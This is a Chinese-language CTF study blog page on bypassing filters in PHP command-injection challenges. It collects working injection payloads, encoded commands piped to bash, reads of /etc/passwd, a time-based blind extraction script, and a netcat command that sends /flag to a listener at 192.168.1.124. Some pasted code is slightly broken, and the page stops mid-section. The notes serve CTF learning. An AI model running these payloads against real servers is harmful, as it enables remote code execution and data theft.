<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="目录操作系统连接符：操作系统连接符：拼接命令 分号；：多个命令无论对错顺序执行   比如源码是system（”ls”.$cmd）为了读取flag我们可以对cmd传参   cmd&#x3D;;cat &#x2F;flag   这样会先查看目录后读取flag文件 &amp;:作用和分号一样，但是在使用的时候要把&amp;进行URL编码为%26才能正常执行   cmd&#x3D;%26cat &amp;#x2F">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2024/11/12/%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95%E5%A4%A7%E5%85%A8/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="目录操作系统连接符：操作系统连接符：拼接命令 分号；：多个命令无论对错顺序执行   比如源码是system（”ls”.$cmd）为了读取flag我们可以对cmd传参   cmd&#x3D;;cat &#x2F;flag   这样会先查看目录后读取flag文件 &amp;:作用和分号一样，但是在使用的时候要把&amp;进行URL编码为%26才能正常执行   cmd&#x3D;%26cat &amp;#x2F">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\5b0dde18c80cb9f861cca7cb0cb0655f.png">
<meta property="og:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\1d2183f71c52b8a32182f0161730b15a.png">
<meta property="og:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\4a96e96dda6d182427841d667b5811b6.png">
<meta property="og:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\a0777df5f314e9b3cb7bc663dad6e7cc.png">
<meta property="og:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\e0cfb0b1614b4ebe1e498d3eb7be1dc5.png">
<meta property="og:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\cef354759e2a98a3ee1d8f083684f7c8.png">
<meta property="og:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\3a5510a74a3c76ab9dcea730917d6354.jpeg">
<meta property="og:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\525664d020356da4d350ab1ce8a35867.jpeg">
<meta property="og:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\581490f0d59d1adeb8f57486925f844f.jpeg">
<meta property="og:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\45bf9ecdf93ba66ecaf3afe1a6125558.jpeg">
<meta property="og:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\e6a61295b9605635d97394857cb64441.jpeg">
<meta property="article:published_time" content="2024-11-12T11:03:37.929Z">
<meta property="article:modified_time" content="2024-11-12T12:31:20.856Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="d:\myblog\source_posts\%E5%9B%BE%E7%89%87\5b0dde18c80cb9f861cca7cb0cb0655f.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-绕过方法大全" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/11/12/%E7%BB%95%E8%BF%87%E6%96%B9%E6%B3%95%E5%A4%A7%E5%85%A8/" class="article-date">
  <time class="dt-published" datetime="2024-11-12T11:03:37.929Z" itemprop="datePublished">2024-11-12</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="目录"><a href="#目录" class="headerlink" title="目录"></a>目录</h1><h2 id="操作系统连接符："><a href="#操作系统连接符：" class="headerlink" title="操作系统连接符："></a>操作系统连接符：</h2><p>操作系统连接符：<br>拼接命令</p>
<p>分号；：多个命令无论对错顺序执行</p>
<p>  比如源码是system（”ls”.$cmd）为了读取flag我们可以对cmd传参</p>
<p>  <strong>cmd&#x3D;;cat &#x2F;flag</strong></p>
<p>  这样会先查看目录后读取flag文件</p>
<p>&amp;:作用和分号一样，但是在使用的时候要把&amp;进行URL编码为%26才能正常执行</p>
<p>  <strong>cmd&#x3D;%26cat &#x2F;flag</strong></p>
<p>&amp;&amp;：前面命令执行不成功后面命令无法执行</p>
<p>   <strong>cmd&#x3D;ls%26%26cat &#x2F;flag  #成功执行</strong></p>
<p>   <strong>cmd&#x3D;-11%26%26cat &#x2F;flag  #两条命令都不执行</strong></p>
<p>管道输出符|：前面命令的输出作为后面命令的输入，把前面命令的结果作为后面命令的参数;前面后面的命令都执行，但是只显示后面的命令执行结果。</p>
<p>||：前面的命令执行成功，则后面的命令不会执行；前面的命令执行失败，则后面的命令执行（类似if-else语句）</p>
<h2 id="常见函数："><a href="#常见函数：" class="headerlink" title="常见函数："></a>常见函数：</h2><p>常见函数：<br>（至少记住每个函数的两点1、有没有回显2、参数怎么放）</p>
<p>system：语法为system(string $command, int &amp;$return var &#x3D; ?)，command: 执行 command 参数所指定的命令常用参数并且输出执行结果，如果提供 return var 参数，则外部命令执行后的返回状态将会被设置到此变量中。示例：system（’ls’）会直接返回当前文件下的目录。该函数提交命令自己回显</p>
<p>exec：示例exec(“cat &#x2F;flag”)，其本身没有回显</p>
<p>passthru（读取二进制流）：system()的平替，写个命令就会执行命令，自己能回显</p>
<p>shell_exec和反引号&#96;&#96;:格式分别为shell_exec（ls）和<code>ls</code>,不能自己回显，需要借用echo\print等输出结果</p>
<p>popen:语法为popen(string $command, string $mode),command参数: 要执行的命令,mode参数: 模式’r’表示阅读，’w’ 表示写入。不能自己回显，需要print_r等输出内容</p>
<p>proc_popen:语法为proc_open($command,$descriptor spec,$pipes,$cwd,$env vars,$options),</p>
<p><strong>$command是要执行的命令。</strong><br><strong>$descriptorspec是一个描述符规范数组，用于指定进程的输入、输出和错误的文件描述符。</strong><br><strong>$pipes是一个引用变量，用于存储与进程相关的管道。</strong><br><strong>$cwd（可选）是设置子进程的当前工作目录。</strong><br><strong>$env（可选）是设置子进程的环境变量。</strong><br><strong>$other_options（可选）是其他选项，如设置超时等。</strong><br><strong>我也不太清楚，但是挺复杂的参数多，而且不能自己回显</strong></p>
<p>pcntl_exec:语法格式为pcntl exec(string $path, array $args &#x3D; ?, array $envs &#x3D; ?)<br>path必须时可执行二进制文件路径或一个在文件第一行指定了 一个可执行文件路径标头的脚本 (比如文件第一行是#!&#x2F;usr&#x2F;local&#x2F;bin&#x2F;perl的perl脚本)。args是一个要传递给程序的参数的字符串数组。<br>envs是一个要传递给程序作为环境变量的字符串数组。这个数组是 key &#x3D;&gt; value格式的，key代表要传递的环境变量的名称，value代表该环境变量值。该函数没有回显，解决方法一：cat文件并输出到有权限读取路径；解决方法二：shell反弹</p>
<h2 id="绕过过滤："><a href="#绕过过滤：" class="headerlink" title="绕过过滤："></a>绕过过滤：</h2><p>绕过过滤：<br>include（’’）＋伪协议文件包含读取</p>
<h3 id="空格过滤绕过："><a href="#空格过滤绕过：" class="headerlink" title="空格过滤绕过："></a>空格过滤绕过：</h3><p>空格过滤绕过：<br>1、大括号{}：<br><strong>{cat,flag.php}</strong></p>
<p>2、$IFS代替空格：<br>$IFS$9，${IFS}，$IFS这三个都行</p>
<p><strong>Linux下有一个特殊的环境变量叫做IFS，叫做内部字段分隔符 (internal field separator)。</strong><br><strong>?cmd&#x3D;ls$IFS-I</strong><br><strong>单纯$IFS2,IFS2被bash解释器当做变量名，输不出来结果，加一个{}就固定了变量名</strong><br><strong>?cmd&#x3D;ls${IFS}-l</strong><br><strong>$IFS$9后面加个$与{}类似，起截断作用，$9是当前系统shell进程第九个参数持有者始终为空字符串。</strong><br><strong>?cmd&#x3D;ls${IFS}$9-l</strong></p>
<p>3、重定向字符&lt;，&lt;&gt;<br>4、%09绕过（相当于Tab键）</p>
<h3 id="文件名过滤绕过："><a href="#文件名过滤绕过：" class="headerlink" title="文件名过滤绕过："></a>文件名过滤绕过：</h3><p>文件名过滤绕过：<br>1、??,<em>绕过<br>passthru代替system，过滤flag文件名用?，</em>绕过</p>
<p><strong>cat &#x2F;fl??</strong></p>
<p><em><em>cat &#x2F;f</em>  #多个匹配结果同时展现</em>*</p>
<p>以上指令等效于cat &#x2F;flag</p>
<p>2、单引号(‘)双引号(“”)反引号(&#96;&#96;)绕过正则<br><strong>cat &#x2F;fl””ag</strong></p>
<p><strong>c””at &#x2F;e’t’c&#x2F;pas<code>s</code>wd</strong> </p>
<p>对php来说这是fl””ag而不是flag关键字不会匹配上，但是对于linux系统来说cat &#x2F;fl””ag等效于cat &#x2F;flag。外面包裹的是单引号里面就是双引号，外面包裹的是双引号里面就是单引号，或者用斜线\去掉功能性，避免报错</p>
<p><strong>passthru(‘cat &#x2F;fl””ag.p&#39;&#39;hp’)</strong></p>
<p>3、反斜杠\绕过<br>\特殊字符去掉功能性，单纯表示为字符串，而linux看到反斜线\会自动帮你去掉,正常执行命令</p>
<p><strong>cat fl\ag.p\hp</strong></p>
<p> 4、特殊变量：$1到$9、$@和$*<br>这些特殊变量输出为空</p>
<p><strong>cat &#x2F;fl$9ag</strong></p>
<p><strong>cat &#x2F;fl$@ag</strong></p>
<p>或者在单词结尾处插入$x，这里的x可以是任意字母，例如可以写成如下形式：</p>
<p><strong>c$@at &#x2F;e$@tc&#x2F;pas$@swd</strong></p>
<p><strong>cat$x &#x2F;etc$x&#x2F;passwd$x</strong></p>
<p><strong>ca$@t &#x2F;etc$x&#x2F;passwd$x</strong></p>
<p> 5、内联执行绕过<br><strong>a&#x3D;c;b&#x3D;a;c&#x3D;t;$a$b$c &#x2F;1.txt</strong></p>
<p><strong>a&#x3D;f;c&#x3D;a;d&#x3D;g;b&#x3D;l;cat $a$b$c$d.php（abcd拼接出来flag）</strong></p>
<p>6、利用linux中的环境变量<br>使用环境变量里的字符执行变量</p>
<p><strong>echo $PATH              #PATH默认系统环境变量</strong></p>
<p>如果出现：</p>
<p><strong>&#x2F;usr&#x2F;local&#x2F;sbin:&#x2F;usr&#x2F;local&#x2F;bin:&#x2F;usr&#x2F;sbin:&#x2F;usr&#x2F;bin:&#x2F;sbin:&#x2F;bin:&#x2F;usr&#x2F;games:&#x2F;usr&#x2F;local&#x2F;games:&#x2F;snap&#x2F;bin</strong></p>
<p><strong>echo f${PATH:5:1}${PATH:8:1}${PATH:66:1}.${PATH:93:1}h${PATH:93:1}</strong><br><strong>表示了flag.php</strong></p>
<p>比如${PATH:5:1}指的是取路径的第五位（从0开始数，第0位是&#x2F;）的字符，步长为1，即只取一个字母l，以此类推就能拼接成关键字flag.php</p>
<h3 id="常见文件读取命令绕过："><a href="#常见文件读取命令绕过：" class="headerlink" title="常见文件读取命令绕过："></a>常见文件读取命令绕过：</h3><p>常见文件读取命令绕过：<br>1、base64编码：<br><strong>cat flag.php–&gt; Y2FOIGZSYWcucGhw</strong><br><strong>echo Y2FOIGZsYWcucGhw | base64 -d</strong><br><strong>管道符|把前面指令执行的结果，变成后面指令的参数，所以这里会解码读取命令</strong></p>
<p>执行命令的话有三种形式：</p>
<p><strong>echo Y2FOIGZsYWcucGhw | base64 -d | bash</strong></p>
<p><strong>$(echo Y2FOIGZsYWcucGhw | base64 -d)</strong></p>
<p><strong><code>echo Y2FOIGZsYWcucGhw | base64 -d</code>   #反引号</strong></p>
<p> 把cat flag.php，放在bash里执行，同理想换成什么命令就base64编码后替换</p>
<p>2、base32编码同理<br><strong>?cmd&#x3D;system(‘echo “MNQXIIDGNRQWOLTQNBYA&#x3D;&#x3D;&#x3D;&#x3D;”|base32 -d|&#x2F;bin&#x2F;bash’);</strong></p>
<p>3、HEX编码（ASCII编码）<br>python脚本</p>
<p><strong>import binascii</strong><br><strong>s &#x3D; b”tac flag”</strong><br><strong>h &#x3D; binascii.b2a_hex(s)</strong><br><strong>print(h)</strong><br>tac flag–&gt; 74616320666c6167</p>
<p><strong>echo “74616320666c6167”|xxd -r -p|bash</strong></p>
<p>xxd: 二进制显示和处理文件工具。<br>-r-p将纯十六进制转储的反向输出打印为了ASCII格式<br>bash、sh、&#x2F;bin&#x2F;bash、反引号等</p>
<p><strong>?cmd&#x3D;passthru(‘echo “74616320666c6167”|xxd -r -p|bash’);</strong></p>
<p>4、shellcode编码（16进制的机器码）<br><strong>?cmd&#x3D;passthru(‘printf”\x74\x61\x63\x20\x66\x6c\x61\x67\x2e\x70\x68\x70”|bash’);</strong></p>
<p><strong>?cmd&#x3D;passthru(‘<code>printf&quot;\x74\x61\x63\x20\x66\x6c\x61\x67\x2e\x70\x68\x70&quot;</code>‘);</strong></p>
<p><strong>?cmd&#x3D;passthru(‘$(printf”\x74\x61\x63\x20\x66\x6c\x61\x67\x2e\x70\x68\x70”)’);</strong></p>
<h3 id="读取命令被绕过："><a href="#读取命令被绕过：" class="headerlink" title="读取命令被绕过："></a>读取命令被绕过：</h3><p>读取命令被绕过：<br>比如说过滤了cat，在这之前先分清</p>
<p><strong>cat flag.php 是用于在终端上显示当前目录下名为 flag.php 的文件的内容。</strong></p>
<p><strong>cat &#x2F;flag 是用于在终端上显示根目录下名为 flag 的文件的内容。</strong></p>
<p><strong>cat flag 是用于在终端上显示当前目录下名为 flag 的文件的内容。</strong></p>
<p>正常来说flag放在根目录下，不过也可能是在当前网页目录下</p>
<p>别的指令也同理</p>
<p>1、tac:反向显示，从最后一行开始往前显示<br><strong>tac &#x2F;flag</strong></p>
<p>2、more:一页一页显示档案内容<br><strong>more flag.php</strong></p>
<p>3、less：与more类似<br>4、tail：查看末尾几行<br>5、nl：显示的时候，顺便输出行号<br><strong>nl &#x2F;flag</strong></p>
<p>nl &#x2F;flag 和 nl flag 是不同的。</p>
<p>在 Linux 系统中，nl 命令用于给文件添加行号。当使用 nl &#x2F;flag 命令时，&#x2F;flag 被视为一个文件路径，并将该文件的内容输出到标准输出（通常是终端），并在每一行前添加行号。如果 &#x2F;flag 文件存在且有读取权限，那么 nl &#x2F;flag 将会给该文件的内容添加行号。</p>
<p>而当使用 nl flag 命令时，flag 被视为一个相对于当前目录的文件路径。也就是说，nl flag 命令将会尝试在当前目录下找到名为 flag 的文件，并给其内容添加行号。（不过flag一般在根目录）</p>
<p>6、od：以二进制方式读取档案内容。正常的od &#x2F;flag输出的纯纯二进制<br>想看到文件内容需要：</p>
<p><strong>passthru(“od -A d -c &#x2F;fla\g”);</strong></p>
<p>7、xxd：读取二进制文件<br><strong>xxd &#x2F;flag</strong></p>
<p>8、sort：主要用于排序文件<br><strong>so?t &#x2F;flag</strong></p>
<p><strong>&#x2F;usr&#x2F;bin&#x2F;s?rt &#x2F;flag</strong> </p>
<p>&#x2F;usr&#x2F;bin&#x2F;sort 和 sort 实际上是同一个命令。&#x2F;usr&#x2F;bin 目录是系统的标准目录之一，它包含了许多系统命令和工具的二进制文件，而 sort 命令通常就存放在 &#x2F;usr&#x2F;bin 目录中,因此&#x2F;usr&#x2F;bin&#x2F;sort &#x2F;flag 和 sort &#x2F;flag 是等价的。有时候sort不行可能&#x2F;usr&#x2F;bin&#x2F;s?rt可以</p>
<p>9、uniq：报告或删除文件中重复的行，其实当成cat用就行<br>10、file -f:报错出具体内容<br><strong>passthru(“file -f &#x2F;flag”);</strong></p>
<p>11、grep：在文本中查找指定字符串<br><em><em>passthru(“grep fla &#x2F;fla</em>“);</em>*</p>
<p>grep fla &#x2F;fla* 命令会匹配根目录下所有以 fla 开头的文件（不包括子目录），然后将这些文件中包含字符串 fla 的行输出到终端上。因此，这个命令会搜索根目录下以 fla 开头的所有文件，并匹配其中包含 fla 字符串的行。</p>
<p>而 grep fla fla* 命令中 fla* 是当前目录下以 fla 开头的所有文件的通配符，它会匹配当前目录下所有以 fla 开头的文件，然后将这些文件中包含字符串 fla 的行输出到终端上。因此，这个命令只会搜索当前目录下以 fla 开头的文件，并匹配其中包含 fla 字符串的行。</p>
<p>12、strings：<br>相当于cat</p>
<h3 id="无回显时间盲注："><a href="#无回显时间盲注：" class="headerlink" title="无回显时间盲注："></a>无回显时间盲注：</h3><p>无回显时间盲注：<br>逻辑和SQL注入的时间盲注差不多</p>
<p>相关命令：<br>1.sleep<br><strong>sleep 5       #5秒之后返回结果</strong></p>
<p>2.awk：逐行获取数据<br>3.cut -c<br>cut命令逐列获取单个字符<br><strong>cat flag | awk NR&#x3D;&#x3D;2  | cut -c 1      #获取第一个字符</strong><br><strong>cat flag | awk NR&#x3D;&#x3D;2  | cut -c 2      #获取第二个字符</strong></p>
<p>4、if语句：判断命令是否执行<br>if [ $(cat flag | awk NR&#x3D;&#x3D;2 | cut -c 1) &#x3D;&#x3D; F ];then sleep 2;fi<br>if里的判断语句为真的话，则执行sleep 2，休眠2秒后返回结果 </p>
<p>时间注入脚本：</p>
<p><strong>import requests</strong><br><strong>import time</strong><br><strong>url &#x3D;”<a target="_blank" rel="noopener" href="http://192.168.1.6:19080/class08/1.php">http://192.168.1.6:19080/class08/1.php</a>“</strong><br><strong>result &#x3D; “”</strong><br><strong>for i in range(1,5): &#x2F;&#x2F;定义i、j、k三个变量</strong><br>    <strong>for j in range(1,10):<br>        for k in range(32,128):  &#x2F;&#x2F;ascii码表</strong><br>          <strong>k&#x3D;chr(k)  &#x2F;&#x2F;把ascii码转换成字母，HEX编码变成字符</strong><br>          <strong>time.sleep(0.1)  &#x2F;&#x2F;i定义读取1-5行，i定义读取1-55个字符</strong><br>          <strong>payload &#x3D; “?cmd&#x3D;” + f”if[ <code>ls | awk NR==&#123;i&#125; | cut -c &#123;j&#125;</code>&#x3D;&#x3D;{k}];then sleep 2;fi”</strong><br>          <strong>try:</strong><br>            <strong>requests.get(url&#x3D;url+payload, timeout&#x3D;(1.5,1.5))</strong><br>          <strong>except:</strong><br>            <strong>result &#x3D; result + k   &#x2F;&#x2F;把值加入result，print输出显示</strong><br>            <strong>print(result)</strong><br>            <strong>break</strong><br><strong>result +&#x3D; “”</strong></p>
<h3 id="长度过滤："><a href="#长度过滤：" class="headerlink" title="长度过滤："></a>长度过滤：</h3><p>长度过滤：<br>前置知识：</p>
<blockquote>
<p>和&gt;&gt;：</p>
</blockquote>
<blockquote>
<p>b 类似于touch b，即直接创建文件b，通过&gt;来将命令执行结果写入文件会覆盖掉文件原本的内容</p>
</blockquote>
<p><strong>echo kuai &gt; a  #创建文件a，并把字符串’kuai’写入到文件a里</strong></p>
<blockquote>
<blockquote>
<p>用来追加内容</p>
</blockquote>
</blockquote>
<p><strong>kuai &gt;&gt;a   #在文件a末尾追加字符串’kuai’</strong></p>
<p>ls -t命令：按时间顺序，由近及远排序（后创建的排在前面，只能精确到秒）</p>
<p>组合运用示例:<br><strong>#&gt;ag</strong></p>
<p><strong>#&gt;fl</strong><br><strong>#&gt;”t”</strong><br><strong>#&gt;ca</strong><br><strong>#ls -t</strong><br><strong>ca ‘t ‘ fl ag</strong></p>
<p>按时间顺序反向依次创建文件，”ca” “‘t “ “fl” “ag”<br>再通过ls -t &gt; x，创建文件x，并把’Is -t执行结果写入文件x里 。</p>
<p>实际上在创建文件时，加入”&quot;，把命令”ca””t””f””ag”连接起来</p>
<p><strong>#&gt;ag</strong><br><strong>#fl\</strong><br><strong>#&gt;”t\“</strong><br><strong>#&gt;ca\</strong><br>#ls -t &gt; a**       </p>
<p>前面的‘\’把后面的‘\’实体化变成字符 ，把一段已经拼接好的文件名输出到输出到一个文件a里，然后把这个文件a当成一个脚本去执行</p>
<p>sh：sh命令是shell命令语言解释器，执行命令从标准输入读取或从一个文件中读取</p>
<p>dir及*：<br>*：相当于$(dir *)</p>
<p>**#dir ***<br><strong>echo ffff</strong><br><strong>#$(dir <em>)<br>ffff            &#x2F;&#x2F;执行echo命令输出ffff<br>#</em></strong><br><strong>ffff            &#x2F;&#x2F;执行echo命令输出ffff</strong></p>
<p>如果第一个文件名是命令的话就会执行命令,返回执行的结果，之后的文件名作为参数传入 </p>
<p>rev:翻转文件每一行内容</p>
<p>长度限制为7绕过方法：<br>期望执行的命令：</p>
<p><strong>cat &#x2F;flag|nc 192.168.1.124 7777</strong>   </p>
<p>cat &#x2F;flag展示内容，再通过nc反弹提交到192.168.1.124:7777，kali的IP地址192.168.1.124监听端口7777 </p>
<p>去kali把监听打开 ：</p>
<p><strong>nc -lvp 7777</strong></p>
<p> 利用逻辑：</p>
<blockquote>
<p>创建短的文件名<br>Is -t 按时间顺序列出文件名，按行储存<br>\连接换行命令<br>sh从文件中读取命令</p>
</blockquote>
<p><strong>?cmd&#x3D;&gt;7777</strong></p>
<p><strong>?cmd&#x3D;&gt;\ \</strong></p>
<p><strong>?cmd&#x3D;&gt;&gt;124\</strong></p>
<p><strong>?cmd&#x3D;&gt;1.\</strong></p>
<p><strong>?cmd&#x3D;&gt;168.\</strong></p>
<p><strong>?cmd&#x3D;&gt;192.\</strong></p>
<p><strong>?cmd&#x3D;&gt;c\ \</strong></p>
<p><strong>?cmd&#x3D;&gt;|n\</strong></p>
<p><strong>?cmd&#x3D;&gt;flag\</strong></p>
<p><strong>?cmd&#x3D;&gt;t\ \</strong></p>
<p><strong>?cmd&#x3D;&gt;ca\    #从近往远的文件名能构成命令cat &#x2F;flag|nc 192.168.1.124 7777<br>?cmd&#x3D;ls -t&gt;a   #将文件名按从近往远的顺序写入到文件a</strong></p>
<p>脚本执行：</p>
<p><strong>import time</strong><br><strong>import requests</strong><br><strong>baseurl&#x3D;”url”</strong><br><strong>s &#x3D; requests.session()</strong><br><strong>list&#x3D;[</strong><br>        <strong>‘&gt;7777’,</strong><br>        <strong>‘&gt;ca’,    #中间的内容自己补充</strong><br>        <strong>‘ls -t&gt;a’</strong><br><strong>]</strong><br><strong>for i in list:</strong><br>    <strong>time.sleep(1)</strong><br>    <strong>url &#x3D; baseurl+str(i)</strong><br>    <strong>s.get(url)</strong><br><strong>s.get(baseurl+”sh a”)</strong></p>
<h3 id="无参数命令执行绕过："><a href="#无参数命令执行绕过：" class="headerlink" title="无参数命令执行绕过："></a>无参数命令执行绕过：</h3><p>无参数命令执行绕过：<br>无参数RCE题目特征：<br><strong>if(‘;’ &#x3D;&#x3D;&#x3D; preg_replace(‘&#x2F;[^\W]+((?R)?)&#x2F;‘, ‘’, $_GET[‘star’])) {<br>    eval($_GET[‘star’]);</strong><br><strong>}</strong><br>正则表达式 [^\W]+((?R)?) 匹配了一个或多个非标点符号字符（表示函数名），后跟一个括号（表示函数调用）。其中 (?R) 是递归引用，它只能匹配和替换嵌套的函数调用，而不能处理函数参数。使用该正则表达式进行替换后，每个函数调用都会被删除，只剩下一个分号 ;，而最终结果强等于；时，payload才能进行下一步。简而言之，无参数rce就是不使用参数，而只使用一个个函数最终达到目的。</p>
<p><strong>scandir()可以使用里面不含参数</strong><br><strong>scandir(‘1’)不可以使用，里面含有参数1，无法被替换删除</strong><br>相关函数简要介绍：<br>scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组，其中包含当前目录下的所有文件和目录名称（glob()可替换）<br>localeconv() ：返回一包含本地数字及货币格式信息的数组。（但是这里数组第一项就是‘.’，这个.的用处很大）<br>current() ：返回数组中的单元，默认取第一个值。pos()和current()是同一个东西<br>getcwd() :取得当前工作目录<br>dirname():函数返回路径中的目录部分<br>array_flip() :交换数组中的键和值，成功时返回交换后的数组<br>array_rand() :从数组中随机取出一个或多个单元</p>
<p>array_reverse():将数组内容反转</p>
<p>strrev():用于反转给定字符串</p>
<p>getcwd()：获取当前工作目录路径</p>
<p>dirname() ：函数返回路径中的目录部分。<br>chdir() ：函数改变当前的目录。</p>
<p>eval()、assert()：命令执行</p>
<p>hightlight_file()、show_source()、readfile()：读取文件内容</p>
<p>举个例子scandir(‘.’)是返回当前目录,虽然我们无法传参，但是由于localeconv() 返回的数组第一个就是‘.’，current()取第一个值，那么current(localeconv())就能构造一个‘.’,那么以下就是一个简单的返回查看当前目录下文件的payload：</p>
<p><strong>?参数&#x3D;var_dump(scandir(current(localeconv())));</strong><br>数组移动操作：</p>
<p><strong>end() ： 将内部指针指向数组中的最后一个元素，并输出</strong><br><strong>next() ：将内部指针指向数组中的下一个元素，并输出</strong><br><strong>prev() ：将内部指针指向数组中的上一个元素，并输出</strong><br><strong>reset() ： 将内部指针指向数组中的第一个元素，并输出</strong><br><strong>each() ： 返回当前元素的键名和键值，并将内部指针向前移动</strong><br>方法一：scandir()  最常规的通解<br>引入一道例题BuuCTF [GXYCTF2019]禁止套娃，代码如下：</p>
<p><strong>&lt;?php**<br>**include “flag.php”;**<br>**echo “flag在哪里呢？<br>“;</strong><br><strong>if(isset($_GET[‘exp’])){<br>    if (!preg_match(‘&#x2F;data://|filter://|php://|phar://&#x2F;i’, $_GET[‘exp’])) {</strong><br>        <strong>if(‘;’ &#x3D;&#x3D;&#x3D; preg_replace(‘&#x2F;[a-z,_]+((?R)?)&#x2F;‘, NULL, $_GET[‘exp’])) {</strong><br>            <strong>if (!preg_match(‘&#x2F;et|na|info|dec|bin|hex|oct|pi|log&#x2F;i’, $_GET[‘exp’])) {<br>                &#x2F;&#x2F; echo $_GET[‘exp’];</strong><br>                <strong>@eval($_GET[‘exp’]);</strong><br>            <strong>}</strong><br>            <strong>else{</strong><br>                <strong>die(“还差一点哦！”);</strong><br>            <strong>}</strong><br>        <strong>}</strong><br>        <strong>else{</strong><br>            <strong>die(“再好好想想！”);</strong><br>        <strong>}</strong><br>    <strong>}</strong><br>    <strong>else{</strong><br>        <strong>die(“还想读flag，臭弟弟！”);</strong><br>    <strong>}</strong><br><strong>}</strong><br><strong>&#x2F;&#x2F; highlight_file(FILE);</strong><br><strong>?&gt;</strong></p>
<p> 第一眼看见第二个if语句，if(‘;’ &#x3D;&#x3D;&#x3D; preg_replace(‘&#x2F;[a-z,_]+&#x2F;‘, NULL, $_GET[‘exp’]))可以看出这是典型的无参数rce,然后是后面的if (!preg_match(‘&#x2F;et|na|info|dec|bin|hex|oct|pi|log&#x2F;i’, $_GET[‘exp’])，这里限制了phpinfo()，getcwd()这些函数用不了</p>
<p>最终payload为：</p>
<p><strong>?exp&#x3D;highligth_file(next(array_reverse(scandir(current(localeconv())))));</strong><br>接下来逐个解析，1、 这里的var_dump(localeconv());我们能看见第一个string[1]就是一个“.”，这个点是由localeconv()产生的</p>
<p><img src="D:\myblog\source_posts\图片\5b0dde18c80cb9f861cca7cb0cb0655f.png" alt="bc003f83c1ae474cbb11b09081079bb1.png"></p>
<p>2、 利用current()函数将这个点取出来的，‘.’代表的是当前目录，那接下来就很好理解了，我们可以利用这个点完成遍历目录的操作，相当于就是linux中的ls指令</p>
<p><img src="D:\myblog\source_posts\图片\1d2183f71c52b8a32182f0161730b15a.png" alt="050afd1e1f0e4f3cbd91c4e0dc7bc032.png"></p>
<p>3、既然current()取第一个值，那么current(localeconv())构造一个‘.’,而’.’ 表示当前目录，scandir(‘.’) 将返回当前目录中的文件和子目录，这里我们得知flag所在的文件名就是flag.php</p>
<p><img src="D:\myblog\source_posts\图片\4a96e96dda6d182427841d667b5811b6.png" alt="ba1b85492f9c47e08304bd30c942a74a.png"></p>
<p>4、然而flag的文件名在比较后端我们可以通过array_reverse()将数组内容反转，让它从倒数第二的位置变成正数第二</p>
<p><img src="D:\myblog\source_posts\图片\a0777df5f314e9b3cb7bc663dad6e7cc.png" alt="0f186a637f3d4fa9aded3480e377d5be.png"></p>
<p>5、移动指针读取第二个数组，参照下列数组移动操作可知我们应选用next()函数：</p>
<p><strong>end() ： 将内部指针指向数组中的最后一个元素，并输出</strong><br><strong>next() ：将内部指针指向数组中的下一个元素，并输出</strong><br><strong>prev() ：将内部指针指向数组中的上一个元素，并输出</strong><br><strong>reset() ： 将内部指针指向数组中的第一个元素，并输出</strong><br><strong>each() ： 返回当前元素的键名和键值，并将内部指针向前移动</strong><br>6、最后用highlight_file()返回文件内容</p>
<p>使用最多最灵活的一个函数,可以构造出不同用法，这里直接引用了别人的payload：</p>
